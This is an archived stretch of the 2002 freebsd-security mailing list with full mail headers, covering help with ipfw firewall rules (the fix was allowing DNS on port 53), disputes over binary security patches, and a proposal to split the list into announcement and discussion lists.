you did with the outside. > > If you are looking for hints on how to generally improve your > filter rules I strongly suggest you have a look at the ipfilter > HowTo -- even if you don't use ipf: this document talks about > the basics, too, plus derives / designes a rule set from bottom > up. Visit www.ipfilter.org or look at the misc/26763 PR (Cyrille > Lefevre, "installing ipfilter sample files to share/examples"). > > > virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 > Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net > -- > If you don't understand or are scared by any of the above > ask your parents or an adult to help you. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 17:53:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2C2D637B400 for ; Mon, 1 Jul 2002 17:53:11 -0700 (PDT) Received: from mail.fpsn.net (mail.fpsn.net [63.224.69.57]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2CAED43E0A for ; Mon, 1 Jul 2002 17:53:10 -0700 (PDT) (envelope-from cfaber@fpsn.net) Received: from fpsn.net (mirc-sucks@unixgr.com [63.224.69.60]) (authenticated) by mail.fpsn.net (8.11.6/8.11.6) with ESMTP id g620qxt04336; Mon, 1 Jul 2002 18:52:59 -0600 (MDT) Message-ID: <3D20F94D.3B2820A9@fpsn.net> Date: Mon, 01 Jul 2002 18:52:29 -0600 From: Colin Faber Organization: fpsn.net, Inc. (http://www.fpsn.net) X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: nascar24 Cc: Gerhard Sittig , security@FreeBSD.ORG Subject: Re: Making a firewall more closed References: <01a001c22107$3d3b2850$0200a8c0@winxp> <20020701214825.L1494@shell.gsinet.sittig.org> <007301c22161$c9c76ef0$0200a8c0@winxp> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Do you have a rule in place which precludes 550 ? nascar24 wrote: > > What I mean is that I want to grand acces to the internet. But only to ports > I 'trust', like 80,21,22 etc. But when I make a rule like: > > add 550 allow ip from me to any 80,21,22 > > I cannot acces a website, that puzzles me. > > > On Mon, Jul 01, 2002 at 15:57 +0200, nascar24 wrote: > > > > > > I've been using the IPFW for some time now but I have one problem. I > have > > > closed my firewall (I guess) from attacks from the outside world. But I > am > > > open to attacks from within, i.e: trojan horses etc. > > > > > > Here is my rc.firewall.rules file. I think it is in rule 500 & 550. But > if I > > > change them to 21,22,80,8080 I cannot connect to any websites or FTP > sites. > > > > > > [ filter rule set snipped ] > > > > > > I hope you can help, thanks in advance. > > > > What exactly is your question? > > > > If you want to "less trust the inside", close the inner interface > > as much as you did with the outside. > > > > If you are looking for hints on how to generally improve your > > filter rules I strongly suggest you have a look at the ipfilter > > HowTo -- even if you don't use ipf: this document talks about > > the basics, too, plus derives / designes a rule set from bottom > > up. Visit www.ipfilter.org or look at the misc/26763 PR (Cyrille > > Lefevre, "installing ipfilter sample files to share/examples"). > > > > > > virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 > > Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net > > -- > > If you don't understand or are scared by any of the above > > ask your parents or an adult to help you. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Colin Faber (303) 736-5160 fpsn.net, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 17:54:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B175937B400 for ; Mon, 1 Jul 2002 17:54:42 -0700 (PDT) Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 39E9643E3B for ; Mon, 1 Jul 2002 17:54:42 -0700 (PDT) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id 23A354A9C; Mon, 1 Jul 2002 19:54:41 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g620sZ111570; Mon, 1 Jul 2002 19:54:35 -0500 (CDT) (envelope-from hawkeyd) Date: Mon, 1 Jul 2002 19:54:35 -0500 (CDT) Message-Id: <200207020054.g620sZ111570@sheol.localdomain> Mime-Version: 1.0 X-Newsreader: knews 1.0b.1 Reply-To: hawkeyd@visi.com Organization: if (!FIFO) if (!LIFO) break; References: <4.3.2.7.2.20020701102105.022a44f0_localhost@ns.sol.net> In-Reply-To: <4.3.2.7.2.20020701102105.022a44f0_localhost@ns.sol.net> From: hawkeyd@visi.com (D J Hawkey Jr) Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. X-Original-Newsgroups: sol.lists.freebsd.security To: brett@lariat.org, freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In article <4.3.2.7.2.20020701102105.022a44f0_localhost@ns.sol.net>, brett@lariat.org writes: > >>Please note that I have *not* asked for a binary update. >>I don't want to get flamed the way Brett does... > > ...for asking something reasonable? ;-) > > Seriously: Please do ask. If we do not have up-to-date binary > packages, a large percentage of the new installs of FreeBSD > (both network installs and those from CD-ROM) will be vulnerable > from the start, even though the holes have long been identified. > This is not only unethical but also terrible for FreeBSD's > reputation. Again with the "I need this from y'all 'cuz I'm too lame or lazy to do it myself, and I'm committed to countless customers with a solution of my own making that I can't support.". And now you're going so far as to call The Project "unethical". I gotta wonder if those same customers aren't going to refer to you with the same word pretty soon. You got 'em into this jam; you get 'em out. > Already, the Apache/FreeBSD worm is making the rounds. Why > allow new installs to be vulnerable? Jiminy Crickets, man! Get off you pedestal, roll up your sleeves, and get on with it. You MUST have a lot of work to do, what with spending all this time pissing and moaning about how others won't do it for you. > --Brett Ya know, Brett, in the time it takes for you to let one thread of yours die, I can update two disparate networks with two patches. And I have nowhere's near the expertise you so obviously must have. I won't be re-visiting this thread. Dave -- Windows: "Where do you want to go today?" Linux: "Where do you want to go tomorrow?" FreeBSD: "Are you guys coming, or what?" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 18: 3:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D9C8937B43A for ; Mon, 1 Jul 2002 18:03:14 -0700 (PDT) Received: from idealab.com (il-la.la.idealab.com [63.251.211.5]) by mx1.FreeBSD.org (Postfix) with SMTP id 5DB1D43E13 for ; Mon, 1 Jul 2002 18:03:14 -0700 (PDT) (envelope-from pat@idealab.com) Received: (qmail 28893 invoked by uid 1085); 2 Jul 2002 01:03:08 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 2 Jul 2002 01:03:08 -0000 Date: Mon, 1 Jul 2002 18:03:08 -0700 (PDT) From: Patrick Cahalan X-X-Sender: To: Subject: I'll volunteer Message-ID: <20020701180053.B96837-100000@erie.pas.lab> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To be the post moderator if it will get all of the non-security (ie, you suck! No, you suck!) emails off of this list. Of course, you'd have to then wait for me to wallow through the crud before the list got posted, but it might be worth it, both in terms of my effort and the delay in getting the mail out. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 18: 5:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id B674F37B400 for ; Mon, 1 Jul 2002 18:05:20 -0700 (PDT) Received: from mail3.home.nl (mail3.home.nl [213.51.129.227]) by mx1.FreeBSD.org (Postfix) with ESMTP id F2D3A43E09 for ; Mon, 1 Jul 2002 18:05:19 -0700 (PDT) (envelope-from nascar24@home.nl) Received: from winxp ([217.120.146.224]) by mail3.home.nl (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20020702010259.DOHB28540.mail3.home.nl@winxp>; Tue, 2 Jul 2002 03:02:59 +0200 Message-ID: <008d01c22164$89107ac0$0200a8c0@winxp> From: "nascar24" To: "Ramsey G. Brenner" , References: <01a001c22107$3d3b2850$0200a8c0@winxp> <20020701214825.L1494@shell.gsinet.sittig.org> <007301c22161$c9c76ef0$0200a8c0@winxp> <200207011859.23581.rgbrenner@myrealbox.com> Subject: Re: Making a firewall more closed Date: Tue, 2 Jul 2002 03:05:16 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is my current ruleset: # allow loopback traffic add 100 allow ip from any to any via lo0 # protect loopback address add 200 deny log ip from 127.0.0.1 to any add 249 deny log ip from any to 127.0.0.1 # block spoofs add 400 deny log ip from me to any in via ed0 # enable NATD add 425 divert 8668 ip from any to any via ed0 # check dynamic rules add 450 check-state # make dynamic entries for all outgoing traffic add 500 allow log tcp from me to any 1-65535 keep-state out add 550 allow log udp from me to any 1-65535 keep-state out # services we offer to the world add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state in # pass ICMP add 700 allow log icmp from me to any out add 750 allow log icmp from any to me in # pass everything on private LAN add 800 allow log all from 192.168.0.0/16 to any add 850 allow log all from any to 192.168.0.0/16 # log rejects that have fallen through add 65000 deny log ip from any to any Whith this ruleset I can browse websites, FTP sites etc. But when I replace rules 500 and 550 with this: add 500 allow log tcp from me to any 21,80 keep-state out add 550 allow log udp from me to any 21,80 keep-state out I cannot acces any websites nor FTP sites. But I guess I had just allowed it? Or is the 'out' the problem here. Marcel. On Monday 01 July 2002 06:45 pm, nascar24 wrote: > What I mean is that I want to grand acces to the internet. But only to > ports I 'trust', like 80,21,22 etc. But when I make a rule like: > > add 550 allow ip from me to any 80,21,22 > > I cannot acces a website, that puzzles me. > There is a problem with the rule in the example: You allowed traffic to leave through those ports, but not to enter. We can fix this rule: add 550 allow tcp from me to any 80,21,22 keep-state I noticed you already had a rule 550 - you may want to give it a different number. IPFW (running 4.5R here) gives the following error when trying to load your rule: ipfw: only TCP and UDP protocols are valid with port specifications hence why i changed it from ip to tcp. GL -- ---------- Ramsey G. Brenner rgbrenner@myrealbox.com http://rgbrenner.cjb.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 18:36: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7BC9137B400 for ; Mon, 1 Jul 2002 18:35:58 -0700 (PDT) Received: from hawk.mail.pas.earthlink.net (hawk.mail.pas.earthlink.net [207.217.120.22]) by mx1.FreeBSD.org (Postfix) with ESMTP id 242B443E09 for ; Mon, 1 Jul 2002 18:35:58 -0700 (PDT) (envelope-from rgbrenner@myrealbox.com) Received: from dialup-209.245.11.78.dial1.denver1.level3.net ([209.245.11.78] helo=localhost) by hawk.mail.pas.earthlink.net with esmtp (Exim 3.33 #1) id 17PCaB-0003ZR-00; Mon, 01 Jul 2002 21:35:55 -0400 Content-Type: text/plain; charset="iso-8859-1" From: "Ramsey G. Brenner" To: nascar24@home.nl Subject: Re: Making a firewall more closed Date: Mon, 1 Jul 2002 19:36:30 -0600 X-Mailer: KMail [version 1.4] References: <01a001c22107$3d3b2850$0200a8c0@winxp> <200207011859.23581.rgbrenner@myrealbox.com> <008d01c22164$89107ac0$0200a8c0@winxp> In-Reply-To: <008d01c22164$89107ac0$0200a8c0@winxp> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200207011936.30545.rgbrenner@myrealbox.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You forgot about DNS. If you change rule 550 from add 550 allow log udp from me to any 21,80 keep-state out to add 550 allow log udp from me to any 21,53,80 keep-state out it should work. You may want to find out what IPs you use for DNS, and specifically allow= =20 those addresses. I loaded your rules and im not having any problems now. On Monday 01 July 2002 07:05 pm, nascar24 wrote: > This is my current ruleset: > > # allow loopback traffic > add 100 allow ip from any to any via lo0 > > # protect loopback address > add 200 deny log ip from 127.0.0.1 to any > add 249 deny log ip from any to 127.0.0.1 > > # block spoofs > add 400 deny log ip from me to any in via ed0 > > # enable NATD > add 425 divert 8668 ip from any to any via ed0 > > # check dynamic rules > add 450 check-state > > # make dynamic entries for all outgoing traffic > add 500 allow log tcp from me to any 1-65535 keep-state out > add 550 allow log udp from me to any 1-65535 keep-state out > > # services we offer to the world > add 600 allow log tcp from any to me 22,5067,5617,8472,10000 keep-state= in > > # pass ICMP > add 700 allow log icmp from me to any out > add 750 allow log icmp from any to me in > > # pass everything on private LAN > add 800 allow log all from 192.168.0.0/16 to any > add 850 allow log all from any to 192.168.0.0/16 > > # log rejects that have fallen through > add 65000 deny log ip from any to any > > Whith this ruleset I can browse websites, FTP sites etc. > > But when I replace rules 500 and 550 with this: > > add 500 allow log tcp from me to any 21,80 keep-state out > add 550 allow log udp from me to any 21,80 keep-state out > > I cannot acces any websites nor FTP sites. But I guess I had just allow= ed > it? > > Or is the 'out' the problem here. > > Marcel. > > On Monday 01 July 2002 06:45 pm, nascar24 wrote: > > What I mean is that I want to grand acces to the internet. But only t= o > > ports I 'trust', like 80,21,22 etc. But when I make a rule like: > > > > add 550 allow ip from me to any 80,21,22 > > > > I cannot acces a website, that puzzles me. > > There is a problem with the rule in the example: You allowed traffic to > leave > through those ports, but not to enter. We can fix this rule: > > add 550 allow tcp from me to any 80,21,22 keep-state > > I noticed you already had a rule 550 - you may want to give it a differ= ent > number. IPFW (running 4.5R here) gives the following error when trying = to > load your rule: > > ipfw: only TCP and UDP protocols are valid with port specifications > > hence why i changed it from ip to tcp. > > GL --=20 ---------- Ramsey G. Brenner rgbrenner@myrealbox.com http://rgbrenner.cjb.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20: 5:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A39A237B405; Mon, 1 Jul 2002 20:05:11 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id C108E43E26; Mon, 1 Jul 2002 20:05:10 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA12696; Mon, 1 Jul 2002 21:04:55 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701210053.0229c970@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 21:04:50 -0600 To: "Jacques A. Vidrine" From: Brett Glass Subject: Re: resolv and dynamic linking to compat libc Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020701182234.GO8128@madman.nectar.cc> References: <4.3.2.7.2.20020701120628.023147e0@localhost> <3D1AA5F2.9020305@ca.com> <3D1AA5F2.9020305@ca.com> <4.3.2.7.2.20020701120628.023147e0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:22 PM 7/1/2002, Jacques A. Vidrine wrote: >Gee, I guess we better get cracking to take offline every previous >version of libc, too --- which would mean every version of FreeBSD and >who knows what else. Alas, ethics demand that they be either taken offline or accompanied with a clear, visible, and strong warning. And if compatibility libraries are offered, then yes -- they absolutely should be patched. If you don't, you're distributing vulnerable software, which is not ethical. >How about you help out by enumerating every copy on the Internet, >along with contact information for each? As if you could take those down. But what you *CAN* do is take down vulnerable software and/or accompany by an impossible-to-miss warning. A snapshot of 4.6-STABLE should also be made and released as 4.6.1. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20: 9: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 60C0537B400 for ; Mon, 1 Jul 2002 20:09:07 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 94C8343E0A for ; Mon, 1 Jul 2002 20:09:06 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA12730; Mon, 1 Jul 2002 21:08:40 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701210508.0226bbb0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 21:08:35 -0600 To: Garrett Wollman , Dag-Erling Smorgrav From: Brett Glass Subject: Re: security risk: ktrace(2) in FreeBSD prior to -current. Cc: security@FreeBSD.ORG In-Reply-To: <200207011850.g61IolTT078907@khavrinen.lcs.mit.edu> References: <200206301817.EAA05639@caligula.anu.edu.au> <20020701135719.GA65770@palomine.net> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Garrett, I agree with you. I have wiped the base install from every machine I administer and built OpenSSH-portable 3.4 instead. I've also turned off ChallengeResponseAuthentication on many machines, as well as protocol version 2 on machines where it's not needed. (SSH 1.5 is *slightly* less secure against man-in-the- middle attacks than 2, but not enough to matter -- and all of the recent holes have been in SSH 2.) --Brett At 12:50 PM 7/1/2002, Garrett Wollman wrote: >I don't care about the base-install ssh. Personally, I'd rather it >didn't exist, and I think admins who install it need to have their >heads checked. So there! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20:11:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A147037B400 for ; Mon, 1 Jul 2002 20:11:51 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id D3B9D43E0A for ; Mon, 1 Jul 2002 20:11:50 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id VAA12817 for ; Mon, 1 Jul 2002 21:11:43 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020701210911.022a3650@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Mon, 01 Jul 2002 21:11:38 -0600 To: freebsd-security@FreeBSD.ORG From: Brett Glass Subject: Low-volume list Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This isn't the first time that people have asked for a low-volume FreeBSD security list with announcements only. But discussions of security are important, too, and there should be a place for them! So, perhaps this list should be split into two: "security-announce" (moderated) and "security" (unmoderated). --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20:15: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8215F37B400 for ; Mon, 1 Jul 2002 20:15:00 -0700 (PDT) Received: from smtp013.mail.yahoo.com (smtp013.mail.yahoo.com [216.136.173.57]) by mx1.FreeBSD.org (Postfix) with SMTP id 7912443E09 for ; Mon, 1 Jul 2002 20:14:59 -0700 (PDT) (envelope-from anthonyrubin@yahoo.com) Received: from w184.z064001133.chi-il.dsl.cnc.net (HELO yahoo.com) (anthonyrubin@64.1.133.184 with plain) by smtp.mail.vip.sc5.yahoo.com with SMTP; 2 Jul 2002 03:14:58 -0000 Message-ID: <3D211AB0.9090001@yahoo.com> Date: Mon, 01 Jul 2002 22:14:56 -0500 From: Anthony Rubin User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US; rv:1.0.0) Gecko/20020529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list References: <4.3.2.7.2.20020701210911.022a3650@localhost> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is everyone unaware of freebsd-security-notifications? Brett Glass wrote: > This isn't the first time that people have asked for a low-volume > FreeBSD security list with announcements only. But discussions of > security are important, too, and there should be a place for them! So, > perhaps this list should be split into two: "security-announce" > (moderated) and "security" (unmoderated). > > --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20:17:29 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8691B37B400 for ; Mon, 1 Jul 2002 20:17:26 -0700 (PDT) Received: from gate21.fw.porsche.de (gate23.fw.porsche.de [193.174.9.99]) by mx1.FreeBSD.org (Postfix) with SMTP id 5CE7C43E09 for ; Mon, 1 Jul 2002 20:17:25 -0700 (PDT) (envelope-from perisa@porsche.de) Received: (qmail 19283 invoked from network); 2 Jul 2002 03:21:49 -0000 Received: from unknown (HELO wuxin011.ibd.porsche.de) (141.36.65.1) by 193.197.149.150 with SMTP; 2 Jul 2002 03:21:49 -0000 Received: (qmail 18394 invoked from network); 2 Jul 2002 03:17:23 -0000 Received: from wuxws007.ibd.porsche.de (HELO porsche.de) (141.36.2.178) by smtp4cli.ibd.porsche.de with SMTP; 2 Jul 2002 03:17:23 -0000 Message-ID: <3D211BAD.70908@porsche.de> Date: Tue, 02 Jul 2002 05:19:09 +0200 From: Marc Perisa User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0rc3) Gecko/20020523 X-Accept-Language: en, de-de, es-es MIME-Version: 1.0 To: Brett Glass Cc: freebsd-security@FreeBSD.ORG Subject: Re: Low-volume list References: <4.3.2.7.2.20020701210911.022a3650@localhost> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: > This isn't the first time that people have asked for a low-volume > FreeBSD security list with announcements only. But discussions of > security are important, too, and there should be a place for them! So, > perhaps this list should be split into two: "security-announce" > (moderated) and "security" (unmoderated). > > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message quoting http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/eresources.html#ERESOURCES-MAIL ... freebsd-security Security issues freebsd-security-notifications Security notifications ... Rules of the road: * The topic of any posting should adhere to the basic charter of the list it is posted to, e.g. if the list is about technical issues then your posting should contain technical discussion. Ongoing irrelevant chatter or flaming only detracts from the value of the mailing list for everyone on it and will not be tolerated. For free-form discussion on no particular topic, the FreeBSD chat mailing list > is freely available and should be used instead. ... * Personal attacks and profanity (in the context of an argument) are not allowed, and that includes users and developers alike. Gross breaches of netiquette, like excerpting or reposting private mail when permission to do so was not and would not be forthcoming, are frowned upon but not specifically enforced. /However/, there are also very few cases where such content would fit within the charter of a list and it would therefore probably rate a warning (or ban) on that basis alone. ... FREEBSD-SECURITY /Security issues/ FreeBSD computer security issues (DES, Kerberos, known security holes and fixes, etc). This is a technical mailing list for which strictly technical content is expected. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 20:20: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EC1AA37B400 for ; Mon, 1 Jul 2002 20:20:03 -0700 (PDT) Received: from intense.net (server.intense.net [199.217.236.1]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6046E43E0A for ; Mon, 1 Jul 2002 20:20:03 -0700 (PDT) (envelope-from bobber@intense.net) Received: (from root@localhost) by intense.net (8.12.3/8.12.3) id g623K2Zl014112 for freebsd-security@freebsd.org; Mon, 1 Jul 2002 22:20:02 -0500 (CDT) (envelope-from bobber@intense.net) Received: from bob (209.248.134.245.nw.nuvox.net [209.248.134.245]) by intense.net (8.12.3/8.12.3av) with SMTP id g623JxZB014101 for ; Mon, 1 Jul 2002 22:20:00 -0500 (CDT) (envelope-from bobber@intense.net) Message-ID: <0a0a01c22176$c81879e0$6c01a8c0@metropark.metropark.com> From: "Robert Herrold" To: References: <4.3.2.7.2.20020701210911.022a3650@localhost> Subject: Re: Low-volume list Date: Mon, 1 Jul 2002 22:15:51 -0500 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well, I personally like to read the threads of workarounds, consequences, experiences, etc (less the morons who don't like to read and tend to flame). IMHO, I like the list "just the way it is (however without the spam). Robert Herrold Senior Network Engineer Metropark Communications INC 10405 Baur Blvd Suite A St Louis MO 63132 314-439-1900 voice 314-439-1313 fax http://www.metropark.com ----- Original Message ----- From: "Brett Glass" To: Sent: Monday, July 01, 2002 10:11 PM Subject: Low-volume list > This isn't the first time that people have asked for a low-volume FreeBSD > security list with announcements only. But discussions of security are > important, too, and there should be a place for them! So, perhaps this > list should be split into two: "security-announce" (moderated) and > "security" (unmoderated). > > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Jul 1 21:27:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 28B9A37B400 for ; Mon, 1 Jul 2002 21:27:46 -0700 (PDT) Received: from scfep01.kcom.ne.jp (scfep01.kcom.ne.jp [203.141.160.36]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3442E43E09 for ; Mon, 1 Jul 2002 21:27:45 -0700 (PDT) (envelope-from ohmori@korg.co.jp) Received: from scengine03.kcom.ne.jp (scengine03.kcom.ne.jp [203.141.160.42]) by scfep01.kcom.ne.jp (8.11.3/3.7W-o020702) with ESMTP id g624RbY14159; Tue, 2 Jul 2002 13:27:37 +0900 (JST) Received: from scfep02.kcom.ne.jp (scfep02.kcom.ne.jp [203.141.160.37:25]) by scengine03.kcom.ne.jp (Postfix) with ESMTP id CAFD51F02EA for ; Tue, 2 Jul 2002 13:27:31 +0900 (JST) 